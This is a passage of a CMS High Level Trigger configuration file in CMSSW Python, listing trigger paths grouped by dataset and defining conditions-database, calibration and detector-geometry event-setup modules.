'HLT_Mu8_Ele8_CaloIdM_TrackIdM_Mass8_PFHT350_DZ_v19',
'HLT_Mu8_Ele8_CaloIdM_TrackIdM_Mass8_PFHT350_v19',
'HLT_Mu8_TrkIsoVVL_DiPFJet40_DEta3p5_MJJ750_HTT300_PFMETNoMu60_v16',
'HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_CaloDiJet30_CaloBtagDeepCSV_1p5_v1',
'HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_CaloDiJet30_v1',
'HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_PFDiJet30_PFBtagDeepCSV_1p5_v1',
'HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_PFDiJet30_v1',
'HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_v13',
'HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_v11',
'HLT_Mu8_TrkIsoVVL_v12',
'HLT_Mu8_v12',
'HLT_OldMu100_v3',
'HLT_PFHT1050_v18',
'HLT_PFHT180_v17',
'HLT_PFHT250_v17',
'HLT_PFHT330PT30_QuadPFJet_75_60_45_40_TriplePFBTagDeepCSV_4p5_v3',
'HLT_PFHT330PT30_QuadPFJet_75_60_45_40_v9',
'HLT_PFHT350MinPFJet15_v9',
'HLT_PFHT350_v19',
'HLT_PFHT370_v17',
'HLT_PFHT400_FivePFJet_100_100_60_30_30_DoublePFBTagDeepCSV_4p5_v8',
'HLT_PFHT400_FivePFJet_100_100_60_30_30_v8',
'HLT_PFHT400_FivePFJet_120_120_60_30_30_DoublePFBTagDeepCSV_4p5_v8',
'HLT_PFHT400_SixPFJet32_DoublePFBTagDeepCSV_2p94_v8',
'HLT_PFHT400_SixPFJet32_v8',
'HLT_PFHT430_v17',
'HLT_PFHT450_SixPFJet36_PFBTagDeepCSV_1p59_v7',
'HLT_PFHT450_SixPFJet36_v7',
'HLT_PFHT500_PFMET100_PFMHT100_IDTight_v12',
'HLT_PFHT500_PFMET110_PFMHT110_IDTight_v12',
'HLT_PFHT510_v17',
'HLT_PFHT590_v17',
'HLT_PFHT680_v17',
'HLT_PFHT700_PFMET85_PFMHT85_IDTight_v12',
'HLT_PFHT700_PFMET95_PFMHT95_IDTight_v12',
'HLT_PFHT780_v17',
'HLT_PFHT800_PFMET75_PFMHT75_IDTight_v12',
'HLT_PFHT800_PFMET85_PFMHT85_IDTight_v12',
'HLT_PFHT890_v17',
'HLT_PFJet140_v19',
'HLT_PFJet15_v3',
'HLT_PFJet200_v19',
'HLT_PFJet25_v3',
'HLT_PFJet260_v20',
'HLT_PFJet320_v20',
'HLT_PFJet400_v20',
'HLT_PFJet40_v21',
'HLT_PFJet450_v21',
'HLT_PFJet500_v21',
'HLT_PFJet550_v11',
'HLT_PFJet60_v21',
'HLT_PFJet80_v20',
'HLT_PFJetFwd140_v18',
'HLT_PFJetFwd15_v3',
'HLT_PFJetFwd200_v18',
'HLT_PFJetFwd25_v3',
'HLT_PFJetFwd260_v19',
'HLT_PFJetFwd320_v19',
'HLT_PFJetFwd400_v19',
'HLT_PFJetFwd40_v19',
'HLT_PFJetFwd450_v19',
'HLT_PFJetFwd500_v19',
'HLT_PFJetFwd60_v19',
'HLT_PFJetFwd80_v18',
'HLT_PFMET100_PFMHT100_IDTight_CaloBTagDeepCSV_3p1_v8',
'HLT_PFMET100_PFMHT100_IDTight_PFHT60_v9',
'HLT_PFMET110_PFMHT110_IDTight_CaloBTagDeepCSV_3p1_v8',
'HLT_PFMET110_PFMHT110_IDTight_v20',
'HLT_PFMET120_PFMHT120_IDTight_CaloBTagDeepCSV_3p1_v8',
'HLT_PFMET120_PFMHT120_IDTight_PFHT60_v9',
'HLT_PFMET120_PFMHT120_IDTight_v20',
'HLT_PFMET130_PFMHT130_IDTight_CaloBTagDeepCSV_3p1_v8',
'HLT_PFMET130_PFMHT130_IDTight_v20',
'HLT_PFMET140_PFMHT140_IDTight_CaloBTagDeepCSV_3p1_v8',
'HLT_PFMET140_PFMHT140_IDTight_v20',
'HLT_PFMET200_BeamHaloCleaned_v9',
'HLT_PFMET200_NotCleaned_v9',
'HLT_PFMET250_NotCleaned_v9',
'HLT_PFMET300_NotCleaned_v9',
'HLT_PFMETNoMu100_PFMHTNoMu100_IDTight_PFHT60_v9',
'HLT_PFMETNoMu110_PFMHTNoMu110_IDTight_v20',
'HLT_PFMETNoMu120_PFMHTNoMu120_IDTight_PFHT60_v9',
'HLT_PFMETNoMu120_PFMHTNoMu120_IDTight_v20',
'HLT_PFMETNoMu130_PFMHTNoMu130_IDTight_v19',
'HLT_PFMETNoMu140_PFMHTNoMu140_IDTight_v19',
'HLT_PFMETTypeOne100_PFMHT100_IDTight_PFHT60_v9',
'HLT_PFMETTypeOne110_PFMHT110_IDTight_v12',
'HLT_PFMETTypeOne120_PFMHT120_IDTight_PFHT60_v9',
'HLT_PFMETTypeOne120_PFMHT120_IDTight_v12',
'HLT_PFMETTypeOne130_PFMHT130_IDTight_v12',
'HLT_PFMETTypeOne140_PFMHT140_IDTight_v11',
'HLT_PFMETTypeOne200_BeamHaloCleaned_v9',
'HLT_Photon100EBHE10_v2',
'HLT_Photon100EB_TightID_TightIso_v2',
'HLT_Photon100EEHE10_v2',
'HLT_Photon100EE_TightID_TightIso_v2',
'HLT_Photon110EB_TightID_TightIso_v2',
'HLT_Photon120EB_TightID_TightIso_v2',
'HLT_Photon120_R9Id90_HE10_IsoM_v14',
'HLT_Photon120_v13',
'HLT_Photon150_v6',
'HLT_Photon165_R9Id90_HE10_IsoM_v15',
'HLT_Photon175_v14',
'HLT_Photon200_v13',
'HLT_Photon20_HoverELoose_v10',
'HLT_Photon20_v2',
'HLT_Photon300_NoHE_v12',
'HLT_Photon30_HoverELoose_v10',
'HLT_Photon33_v5',
'HLT_Photon35_TwoProngs35_v1',
'HLT_Photon50_R9Id90_HE10_IsoM_EBOnly_PFJetsMJJ300DEta3_PFMET50_v5',
'HLT_Photon50_R9Id90_HE10_IsoM_v14',
'HLT_Photon50_v13',
'HLT_Photon60_R9Id90_CaloIdL_IsoL_DisplacedIdL_PFHT350MinPFJet15_v11',
'HLT_Photon60_R9Id90_CaloIdL_IsoL_DisplacedIdL_v5',
'HLT_Photon60_R9Id90_CaloIdL_IsoL_v5')+cms.vstring( 'HLT_Photon75_R9Id90_HE10_IsoM_EBOnly_CaloMJJ300_PFJetsMJJ400DEta3_v5',
'HLT_Photon75_R9Id90_HE10_IsoM_EBOnly_CaloMJJ400_PFJetsMJJ600DEta3_v5',
'HLT_Photon75_R9Id90_HE10_IsoM_EBOnly_PFJetsMJJ300DEta3_v5',
'HLT_Photon75_R9Id90_HE10_IsoM_EBOnly_PFJetsMJJ600DEta3_v5',
'HLT_Photon75_R9Id90_HE10_IsoM_v14',
'HLT_Photon75_v13',
'HLT_Photon90_CaloIdL_PFHT700_v16',
'HLT_Photon90_R9Id90_HE10_IsoM_v14',
'HLT_Photon90_v13',
'HLT_Physics_v7',
'HLT_QuadPFJet103_88_75_15_DoublePFBTagDeepCSV_1p3_7p7_VBF1_v8',
'HLT_QuadPFJet103_88_75_15_PFBTagDeepCSV_1p3_VBF2_v8',
'HLT_QuadPFJet103_88_75_15_v5',
'HLT_QuadPFJet105_88_76_15_DoublePFBTagDeepCSV_1p3_7p7_VBF1_v8',
'HLT_QuadPFJet105_88_76_15_PFBTagDeepCSV_1p3_VBF2_v8',
'HLT_QuadPFJet105_88_76_15_v5',
'HLT_QuadPFJet111_90_80_15_DoublePFBTagDeepCSV_1p3_7p7_VBF1_v8',
'HLT_QuadPFJet111_90_80_15_PFBTagDeepCSV_1p3_VBF2_v8',
'HLT_QuadPFJet111_90_80_15_v5',
'HLT_QuadPFJet98_83_71_15_DoublePFBTagDeepCSV_1p3_7p7_VBF1_v8',
'HLT_QuadPFJet98_83_71_15_PFBTagDeepCSV_1p3_VBF2_v8',
'HLT_QuadPFJet98_83_71_15_v5',
'HLT_Random_v3',
'HLT_Rsq0p35_v15',
'HLT_Rsq0p40_v15',
'HLT_RsqMR300_Rsq0p09_MR200_4jet_v15',
'HLT_RsqMR300_Rsq0p09_MR200_v15',
'HLT_RsqMR320_Rsq0p09_MR200_4jet_v15',
'HLT_RsqMR320_Rsq0p09_MR200_v15',
'HLT_SingleJet30_Mu12_SinglePFJet40_v11',
'HLT_SinglePhoton10_Eta3p1ForPPRef_v8',
'HLT_SinglePhoton20_Eta3p1ForPPRef_v9',
'HLT_SinglePhoton30_Eta3p1ForPPRef_v9',
'HLT_Tau3Mu_Mu7_Mu1_TkMu1_IsoTau15_Charge1_v4',
'HLT_Tau3Mu_Mu7_Mu1_TkMu1_IsoTau15_v4',
'HLT_Tau3Mu_Mu7_Mu1_TkMu1_Tau15_Charge1_v4',
'HLT_Tau3Mu_Mu7_Mu1_TkMu1_Tau15_v4',
'HLT_TkMu100_v2',
'HLT_Trimuon5_3p5_2_Upsilon_Muon_v5',
'HLT_TrimuonOpen_5_3p5_2_Upsilon_Muon_v3',
'HLT_TripleJet110_35_35_Mjj650_PFMET110_v9',
'HLT_TripleJet110_35_35_Mjj650_PFMET120_v9',
'HLT_TripleJet110_35_35_Mjj650_PFMET130_v9',
'HLT_TripleMu_10_5_5_DZ_v10',
'HLT_TripleMu_12_10_5_v10',
'HLT_TripleMu_5_3_3_Mass3p8_DCA_v3',
'HLT_TripleMu_5_3_3_Mass3p8_DZ_v8',
'HLT_TriplePhoton_20_20_20_CaloIdLV2_R9IdVL_v3',
'HLT_TriplePhoton_20_20_20_CaloIdLV2_v3',
'HLT_TriplePhoton_30_30_10_CaloIdLV2_R9IdVL_v4',
'HLT_TriplePhoton_30_30_10_CaloIdLV2_v4',
'HLT_TriplePhoton_35_35_5_CaloIdLV2_R9IdVL_v4',
'HLT_TrkMu12_DoubleTrkMu5NoFiltersNoVtx_v6',
'HLT_TrkMu16_DoubleTrkMu6NoFiltersNoVtx_v12',
'HLT_TrkMu17_DoubleTrkMu8NoFiltersNoVtx_v13',
'HLT_UncorrectedJetE30_NoBPTX3BX_v6',
'HLT_UncorrectedJetE30_NoBPTX_v6',
'HLT_UncorrectedJetE60_NoBPTX3BX_v6',
'HLT_UncorrectedJetE70_NoBPTX3BX_v6',
'HLT_VBF_DoubleLooseChargedIsoPFTauHPS20_Trk1_eta2p1_v1',
'HLT_VBF_DoubleMediumChargedIsoPFTauHPS20_Trk1_eta2p1_v1',
'HLT_VBF_DoubleTightChargedIsoPFTauHPS20_Trk1_eta2p1_v1',
'HLT_ZeroBias_Alignment_v1',
'HLT_ZeroBias_FirstBXAfterTrain_v3',
'HLT_ZeroBias_FirstCollisionAfterAbortGap_v5',
'HLT_ZeroBias_FirstCollisionInTrain_v4',
'HLT_ZeroBias_IsolatedBunches_v5',
'HLT_ZeroBias_LastCollisionInTrain_v3',
'HLT_ZeroBias_v6') ),
ParkingBPH1 = cms.vstring( 'HLT_Mu12_IP6_part0_v2',
'HLT_Mu7_IP4_part0_v2',
'HLT_Mu8_IP3_part0_v3',
'HLT_Mu8_IP5_part0_v2',
'HLT_Mu8_IP6_part0_v2',
'HLT_Mu9_IP0_part0_v2',
'HLT_Mu9_IP3_part0_v2',
'HLT_Mu9_IP4_part0_v2',
'HLT_Mu9_IP5_part0_v2',
'HLT_Mu9_IP6_part0_v3' ),
ParkingBPH2 = cms.vstring( 'HLT_Mu12_IP6_part1_v2',
'HLT_Mu7_IP4_part1_v2',
'HLT_Mu8_IP3_part1_v3',
'HLT_Mu8_IP5_part1_v2',
'HLT_Mu8_IP6_part1_v2',
'HLT_Mu9_IP4_part1_v2',
'HLT_Mu9_IP5_part1_v2',
'HLT_Mu9_IP6_part1_v3' ),
ParkingBPH3 = cms.vstring( 'HLT_Mu12_IP6_part2_v2',
'HLT_Mu7_IP4_part2_v2',
'HLT_Mu8_IP3_part2_v3',
'HLT_Mu8_IP5_part2_v2',
'HLT_Mu8_IP6_part2_v2',
'HLT_Mu9_IP4_part2_v2',
'HLT_Mu9_IP5_part2_v2',
'HLT_Mu9_IP6_part2_v3' ),
ParkingBPH4 = cms.vstring( 'HLT_Mu12_IP6_part3_v2',
'HLT_Mu7_IP4_part3_v2',
'HLT_Mu8_IP3_part3_v3',
'HLT_Mu8_IP5_part3_v2',
'HLT_Mu8_IP6_part3_v2',
'HLT_Mu9_IP4_part3_v2',
'HLT_Mu9_IP5_part3_v2',
'HLT_Mu9_IP6_part3_v3' ),
ParkingBPH5 = cms.vstring( 'HLT_Mu12_IP6_part4_v2',
'HLT_Mu7_IP4_part4_v2',
'HLT_Mu8_IP3_part4_v3',
'HLT_Mu8_IP5_part4_v2',
'HLT_Mu8_IP6_part4_v2',
'HLT_Mu9_IP4_part4_v2',
'HLT_Mu9_IP5_part4_v2',
'HLT_Mu9_IP6_part4_v3' ),
ParkingBPHPromptCSCS = cms.vstring( 'HLT_Mu12_IP6_ToCSCS_v1',
'HLT_Mu7_IP4_ToCSCS_v1',
'HLT_Mu8_IP3_ToCSCS_v1',
'HLT_Mu8_IP5_ToCSCS_v1',
'HLT_Mu8_IP6_ToCSCS_v1',
'HLT_Mu9_IP4_ToCSCS_v1',
'HLT_Mu9_IP5_ToCSCS_v1',
'HLT_Mu9_IP6_ToCSCS_v1' ),
RPCMonitor = cms.vstring( 'AlCa_RPCMuonNormalisation_v13' ),
ScoutingMonitor = cms.vstring( 'DST_Run3_PFScoutingPixelTracking_v16',
'HLT_Ele115_CaloIdVT_GsfTrkIdT_v14',
'HLT_Ele35_WPTight_Gsf_v9',
'HLT_IsoMu27_v16',
'HLT_Mu50_v13',
'HLT_PFHT1050_v18',
'HLT_Photon200_v13' ),
ScoutingPFRun3 = cms.vstring( 'DST_Run3_PFScoutingPixelTracking_v16' ),
SingleMuon = cms.vstring( 'HLT_IsoMu20_eta2p1_LooseChargedIsoPFTau27_eta2p1_CrossL1_v12',
'HLT_IsoMu20_eta2p1_LooseChargedIsoPFTauHPS27_eta2p1_CrossL1_v4',
'HLT_IsoMu20_eta2p1_LooseChargedIsoPFTauHPS27_eta2p1_TightID_CrossL1_v1',
'HLT_IsoMu20_eta2p1_MediumChargedIsoPFTauHPS27_eta2p1_CrossL1_v1',
'HLT_IsoMu20_eta2p1_MediumChargedIsoPFTauHPS27_eta2p1_TightID_CrossL1_v1',
'HLT_IsoMu20_eta2p1_TightChargedIsoPFTauHPS27_eta2p1_CrossL1_v1',
'HLT_IsoMu20_eta2p1_TightChargedIsoPFTauHPS27_eta2p1_TightID_CrossL1_v1',
'HLT_IsoMu20_v15',
'HLT_IsoMu24_TwoProngs35_v1',
'HLT_IsoMu24_eta2p1_v15',
'HLT_IsoMu24_v13',
'HLT_IsoMu27_v16',
'HLT_IsoMu30_v4',
'HLT_L1SingleMu18_v3',
'HLT_L1SingleMu25_v2',
'HLT_L2Mu10_v7',
'HLT_L2Mu50_v2',
'HLT_Mu10_TrkIsoVVL_DiPFJet40_DEta3p5_MJJ750_HTT350_PFMETNoMu60_v15',
'HLT_Mu12_v3',
'HLT_Mu15_IsoVVVL_PFHT450_CaloBTagDeepCSV_4p5_v8',
'HLT_Mu15_IsoVVVL_PFHT450_PFMET50_v15',
'HLT_Mu15_IsoVVVL_PFHT450_v15',
'HLT_Mu15_IsoVVVL_PFHT600_v19',
'HLT_Mu15_v3',
'HLT_Mu20_v12',
'HLT_Mu27_v13',
'HLT_Mu3_PFJet40_v16',
'HLT_Mu3er1p5_PFJet100er2p5_PFMET100_PFMHT100_IDTight_v2',
'HLT_Mu3er1p5_PFJet100er2p5_PFMET70_PFMHT70_IDTight_v2',
'HLT_Mu3er1p5_PFJet100er2p5_PFMET80_PFMHT80_IDTight_v2',
'HLT_Mu3er1p5_PFJet100er2p5_PFMET90_PFMHT90_IDTight_v2',
'HLT_Mu3er1p5_PFJet100er2p5_PFMETNoMu100_PFMHTNoMu100_IDTight_v2',
'HLT_Mu3er1p5_PFJet100er2p5_PFMETNoMu70_PFMHTNoMu70_IDTight_v2',
'HLT_Mu3er1p5_PFJet100er2p5_PFMETNoMu80_PFMHTNoMu80_IDTight_v2',
'HLT_Mu3er1p5_PFJet100er2p5_PFMETNoMu90_PFMHTNoMu90_IDTight_v2',
'HLT_Mu4_TrkIsoVVL_DiPFJet90_40_DEta3p5_MJJ750_HTT300_PFMETNoMu60_v15',
'HLT_Mu50_IsoVVVL_PFHT450_v15',
'HLT_Mu50_v13',
'HLT_Mu55_v3',
'HLT_Mu8_TrkIsoVVL_DiPFJet40_DEta3p5_MJJ750_HTT300_PFMETNoMu60_v16',
'HLT_OldMu100_v3',
'HLT_TkMu100_v2' ),
Tau = cms.vstring( 'HLT_DoubleMediumChargedIsoPFTau35_Trk1_TightID_eta2p1_Reg_v12',
'HLT_DoubleMediumChargedIsoPFTau35_Trk1_eta2p1_Reg_v12',
'HLT_DoubleMediumChargedIsoPFTauHPS30_L1MaxMass_Trk1_eta2p1_Reg_v1',
'HLT_DoubleMediumChargedIsoPFTauHPS35_Trk1_TightID_eta2p1_Reg_v1',
'HLT_DoubleMediumChargedIsoPFTauHPS35_Trk1_eta2p1_Reg_v4',
'HLT_DoubleMediumChargedIsoPFTauHPS40_Trk1_TightID_eta2p1_Reg_v1',
'HLT_DoubleMediumChargedIsoPFTauHPS40_Trk1_eta2p1_Reg_v1',
'HLT_DoubleTightChargedIsoPFTau35_Trk1_TightID_eta2p1_Reg_v12',
'HLT_DoubleTightChargedIsoPFTau35_Trk1_eta2p1_Reg_v12',
'HLT_DoubleTightChargedIsoPFTauHPS35_Trk1_TightID_eta2p1_Reg_v1',
'HLT_DoubleTightChargedIsoPFTauHPS35_Trk1_eta2p1_Reg_v1',
'HLT_DoubleTightChargedIsoPFTauHPS40_Trk1_TightID_eta2p1_Reg_v1',
'HLT_DoubleTightChargedIsoPFTauHPS40_Trk1_eta2p1_Reg_v1',
'HLT_MediumChargedIsoPFTau180HighPtRelaxedIso_Trk50_eta2p1_1pr_v11',
'HLT_MediumChargedIsoPFTau180HighPtRelaxedIso_Trk50_eta2p1_v12',
'HLT_MediumChargedIsoPFTau200HighPtRelaxedIso_Trk50_eta2p1_v12',
'HLT_MediumChargedIsoPFTau220HighPtRelaxedIso_Trk50_eta2p1_v12',
'HLT_MediumChargedIsoPFTau50_Trk30_eta2p1_1pr_MET100_v12',
'HLT_MediumChargedIsoPFTau50_Trk30_eta2p1_1pr_MET110_v8',
'HLT_MediumChargedIsoPFTau50_Trk30_eta2p1_1pr_MET120_v8',
'HLT_MediumChargedIsoPFTau50_Trk30_eta2p1_1pr_MET130_v8',
'HLT_MediumChargedIsoPFTau50_Trk30_eta2p1_1pr_MET140_v3',
'HLT_MediumChargedIsoPFTau50_Trk30_eta2p1_1pr_MET90_v12',
'HLT_MediumChargedIsoPFTau50_Trk30_eta2p1_1pr_v12',
'HLT_Photon35_TwoProngs35_v1',
'HLT_VBF_DoubleLooseChargedIsoPFTau20_Trk1_eta2p1_v3',
'HLT_VBF_DoubleLooseChargedIsoPFTauHPS20_Trk1_eta2p1_v1',
'HLT_VBF_DoubleMediumChargedIsoPFTauHPS20_Trk1_eta2p1_v1',
'HLT_VBF_DoubleTightChargedIsoPFTauHPS20_Trk1_eta2p1_v1' ),
TestEnablesEcalHcal = cms.vstring( 'HLT_EcalCalibration_v4',
'HLT_HcalCalibration_v5' ),
TestEnablesEcalHcalDQM = cms.vstring( 'HLT_EcalCalibration_v4',
'HLT_HcalCalibration_v5' ),
ZeroBias = cms.vstring( 'HLT_Random_v3',
'HLT_ZeroBias_Alignment_v1',
'HLT_ZeroBias_FirstBXAfterTrain_v3',
'HLT_ZeroBias_FirstCollisionAfterAbortGap_v5',
'HLT_ZeroBias_FirstCollisionInTrain_v4',
'HLT_ZeroBias_IsolatedBunches_v5',
'HLT_ZeroBias_LastCollisionInTrain_v3',
'HLT_ZeroBias_v6' )
)
CSCChannelMapperESSource = cms.ESSource( "EmptyESSource",
recordName = cms.string( "CSCChannelMapperRecord" ),
iovIsRunNotTime = cms.bool( True ),
firstValid = cms.vuint32( 1 )
)
CSCINdexerESSource = cms.ESSource( "EmptyESSource",
recordName = cms.string( "CSCIndexerRecord" ),
iovIsRunNotTime = cms.bool( True ),
firstValid = cms.vuint32( 1 )
)
GlobalParametersRcdSource = cms.ESSource( "EmptyESSource",
recordName = cms.string( "L1TGlobalParametersRcd" ),
iovIsRunNotTime = cms.bool( True ),
firstValid = cms.vuint32( 1 )
)
GlobalTag = cms.ESSource( "PoolDBESSource",
DBParameters = cms.PSet(
connectionRetrialTimeOut = cms.untracked.int32( 60 ),
idleConnectionCleanupPeriod = cms.untracked.int32( 10 ),
enableReadOnlySessionOnUpdateConnection = cms.untracked.bool( False ),
enablePoolAutomaticCleanUp = cms.untracked.bool( False ),
messageLevel = cms.untracked.int32( 0 ),
authenticationPath = cms.untracked.string( "." ),
connectionRetrialPeriod = cms.untracked.int32( 10 ),
connectionTimeOut = cms.untracked.int32( 0 ),
enableConnectionSharing = cms.untracked.bool( True )
),
connect = cms.string( "frontier://FrontierProd/CMS_CONDITIONS" ),
globaltag = cms.string( "103X_dataRun2_HLT_v1" ),
snapshotTime = cms.string( "" ),
toGet = cms.VPSet(
),
DumpStat = cms.untracked.bool( False ),
ReconnectEachRun = cms.untracked.bool( False ),
RefreshAlways = cms.untracked.bool( False ),
RefreshEachRun = cms.untracked.bool( False ),
RefreshOpenIOVs = cms.untracked.bool( False ),
pfnPostfix = cms.untracked.string( "None" )
)
HcalTimeSlewEP = cms.ESSource( "HcalTimeSlewEP",
appendToDataLabel = cms.string( "HBHE" ),
timeSlewParametersM2 = cms.VPSet(
cms.PSet( slope = cms.double( -3.178648 ),
tmax = cms.double( 16.0 ),
tzero = cms.double( 23.960177 )
),
cms.PSet( slope = cms.double( -1.5610227 ),
tmax = cms.double( 10.0 ),
tzero = cms.double( 11.977461 )
),
cms.PSet( slope = cms.double( -1.075824 ),
tmax = cms.double( 6.25 ),
tzero = cms.double( 9.109694 )
)
),
timeSlewParametersM3 = cms.VPSet(
cms.PSet( tspar2 = cms.double( 0.0 ),
tspar0 = cms.double( 12.2999 ),
tspar1 = cms.double( -2.19142 ),
tspar1_siPM = cms.double( 0.0 ),
cap = cms.double( 6.0 ),
tspar0_siPM = cms.double( 0.0 ),
tspar2_siPM = cms.double( 0.0 )
),
cms.PSet( tspar2 = cms.double( 32.0 ),
tspar0 = cms.double( 15.5 ),
tspar1 = cms.double( -3.2 ),
tspar1_siPM = cms.double( 0.0 ),
cap = cms.double( 6.0 ),
tspar0_siPM = cms.double( 0.0 ),
tspar2_siPM = cms.double( 0.0 )
),
cms.PSet( tspar2 = cms.double( 0.0 ),
tspar0 = cms.double( 12.2999 ),
tspar1 = cms.double( -2.19142 ),
tspar1_siPM = cms.double( 0.0 ),
cap = cms.double( 6.0 ),
tspar0_siPM = cms.double( 0.0 ),
tspar2_siPM = cms.double( 0.0 )
),
cms.PSet( tspar2 = cms.double( 0.0 ),
tspar0 = cms.double( 12.2999 ),
tspar1 = cms.double( -2.19142 ),
tspar1_siPM = cms.double( 0.0 ),
cap = cms.double( 6.0 ),
tspar0_siPM = cms.double( 0.0 ),
tspar2_siPM = cms.double( 0.0 )
)
)
)
HepPDTESSource = cms.ESSource( "HepPDTESSource",
pdtFileName = cms.FileInPath( "SimGeneral/HepPDTESSource/data/pythiaparticle.tbl" )
)
eegeom = cms.ESSource( "EmptyESSource",
recordName = cms.string( "EcalMappingRcd" ),
iovIsRunNotTime = cms.bool( True ),
firstValid = cms.vuint32( 1 )
)
es_hardcode = cms.ESSource( "HcalHardcodeCalibrations",
fromDDD = cms.untracked.bool( False ),
toGet = cms.untracked.vstring( 'GainWidths' )
)
hltESSBTagRecord = cms.ESSource( "EmptyESSource",
recordName = cms.string( "JetTagComputerRecord" ),
iovIsRunNotTime = cms.bool( True ),
firstValid = cms.vuint32( 1 )
)
hltESSEcalSeverityLevel = cms.ESSource( "EmptyESSource",
recordName = cms.string( "EcalSeverityLevelAlgoRcd" ),
iovIsRunNotTime = cms.bool( True ),
firstValid = cms.vuint32( 1 )
)
hltESSHcalSeverityLevel = cms.ESSource( "EmptyESSource",
recordName = cms.string( "HcalSeverityLevelComputerRcd" ),
iovIsRunNotTime = cms.bool( True ),
firstValid = cms.vuint32( 1 )
)
ppsPixelTopologyESSource = cms.ESSource( "PPSPixelTopologyESSource",
RunType = cms.string( "Run2" ),
PitchSimY = cms.double( 0.15 ),
PitchSimX = cms.double( 0.1 ),
thickness = cms.double( 0.23 ),
noOfPixelSimX = cms.int32( 160 ),
noOfPixelSimY = cms.int32( 104 ),
noOfPixels = cms.int32( 16640 ),
simXWidth = cms.double( 16.6 ),
simYWidth = cms.double( 24.4 ),
deadEdgeWidth = cms.double( 0.2 ),
activeEdgeSigma = cms.double( 0.02 ),
physActiveEdgeDist = cms.double( 0.15 ),
appendToDataLabel = cms.string( "" )
)
AnyDirectionAnalyticalPropagator = cms.ESProducer( "AnalyticalPropagatorESProducer",
MaxDPhi = cms.double( 1.6 ),
ComponentName = cms.string( "AnyDirectionAnalyticalPropagator" ),
PropagationDirection = cms.string( "anyDirection" )
)
CSCChannelMapperESProducer = cms.ESProducer( "CSCChannelMapperESProducer",
AlgoName = cms.string( "CSCChannelMapperPostls1" )
)
CSCGeometryESModule = cms.ESProducer( "CSCGeometryESModule",
fromDDD = cms.bool( False ),
fromDD4hep = cms.bool( False ),
alignmentsLabel = cms.string( "" ),
appendToDataLabel = cms.string( "" ),
useRealWireGeometry = cms.bool( True ),
useOnlyWiresInME1a = cms.bool( False ),
useGangedStripsInME1a = cms.bool( False ),
useCentreTIOffsets = cms.bool( False ),
applyAlignment = cms.bool( True ),
debugV = cms.untracked.bool( False )
)
CSCIndexerESProducer = cms.ESProducer( "CSCIndexerESProducer",
AlgoName = cms.string( "CSCIndexerPostls1" )
)
CSCObjectMapESProducer = cms.ESProducer( "CSCObjectMapESProducer",
appendToDataLabel = cms.string( "" )
)
CaloGeometryBuilder = cms.ESProducer( "CaloGeometryBuilder",
SelectedCalos = cms.vstring( 'HCAL',
'ZDC',
'EcalBarrel',
'EcalEndcap',
'EcalPreshower',
'TOWER' )
)
CaloTopologyBuilder = cms.ESProducer( "CaloTopologyBuilder" )
CaloTowerConstituentsMapBuilder = cms.ESProducer( "CaloTowerConstituentsMapBuilder",
MapFile = cms.untracked.string( "Geometry/CaloTopology/data/CaloTowerEEGeometric.map.gz" ),
MapAuto = cms.untracked.bool( False ),
SkipHE = cms.untracked.bool( False ),
appendToDataLabel = cms.string( "" )
)
CaloTowerGeometryFromDBEP = cms.ESProducer( "CaloTowerGeometryFromDBEP",
applyAlignment = cms.bool( False )
)
CaloTowerTopologyEP = cms.ESProducer( "CaloTowerTopologyEP",
appendToDataLabel = cms.string( "" )
)
CastorDbProducer = cms.ESProducer( "CastorDbProducer",
appendToDataLabel = cms.string( "" )
)
ClusterShapeHitFilterESProducer = cms.ESProducer( "ClusterShapeHitFilterESProducer",
ComponentName = cms.string( "ClusterShapeHitFilter" ),
PixelShapeFile = cms.string( "RecoPixelVertexing/PixelLowPtUtilities/data/pixelShapePhase1_noL1.par" ),
PixelShapeFileL1 = cms.string( "RecoPixelVertexing/PixelLowPtUtilities/data/pixelShapePhase1_loose.par" ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) )
)
DTGeometryESModule = cms.ESProducer( "DTGeometryESModule",
fromDDD = cms.bool( False ),
fromDD4hep = cms.bool( False ),
DDDetector = cms.ESInputTag( "","" ),
alignmentsLabel = cms.string( "" ),
appendToDataLabel = cms.string( "" ),
attribute = cms.string( "MuStructure" ),
value = cms.string( "MuonBarrelDT" ),
applyAlignment = cms.bool( True )
)
DTObjectMapESProducer = cms.ESProducer( "DTObjectMapESProducer",
appendToDataLabel = cms.string( "" )
)
EcalBarrelGeometryFromDBEP = cms.ESProducer( "EcalBarrelGeometryFromDBEP",
applyAlignment = cms.bool( True )
)
EcalElectronicsMappingBuilder = cms.ESProducer( "EcalElectronicsMappingBuilder" )
EcalEndcapGeometryFromDBEP = cms.ESProducer( "EcalEndcapGeometryFromDBEP",
applyAlignment = cms.bool( True )
)
EcalLaserCorrectionService = cms.ESProducer( "EcalLaserCorrectionService",
maxExtrapolationTimeInSec = cms.uint32( 0 ),
appendToDataLabel = cms.string( "" )
)
EcalPreshowerGeometryFromDBEP = cms.ESProducer( "EcalPreshowerGeometryFromDBEP",
applyAlignment = cms.bool( True )
)
GlobalParameters = cms.ESProducer( "StableParametersTrivialProducer",
TotalBxInEvent = cms.int32( 5 ),
NumberPhysTriggers = cms.uint32( 512 ),
NumberL1Muon = cms.uint32( 8 ),
NumberL1EGamma = cms.uint32( 12 ),
NumberL1Jet = cms.uint32( 12 ),
NumberL1Tau = cms.uint32( 12 ),
NumberChips = cms.uint32( 1 ),
PinsOnChip = cms.uint32( 512 ),
OrderOfChip = cms.vint32( 1 ),
NumberL1IsoEG = cms.uint32( 4 ),
NumberL1JetCounts = cms.uint32( 12 ),
UnitLength = cms.int32( 8 ),
NumberL1ForJet = cms.uint32( 4 ),
IfCaloEtaNumberBits = cms.uint32( 4 ),
IfMuEtaNumberBits = cms.uint32( 6 ),
NumberL1TauJet = cms.uint32( 4 ),
NumberL1Mu = cms.uint32( 4 ),
NumberConditionChips = cms.uint32( 1 ),
NumberPsbBoards = cms.int32( 7 ),
NumberL1CenJet = cms.uint32( 4 ),
PinsOnConditionChip = cms.uint32( 512 ),
NumberL1NoIsoEG = cms.uint32( 4 ),
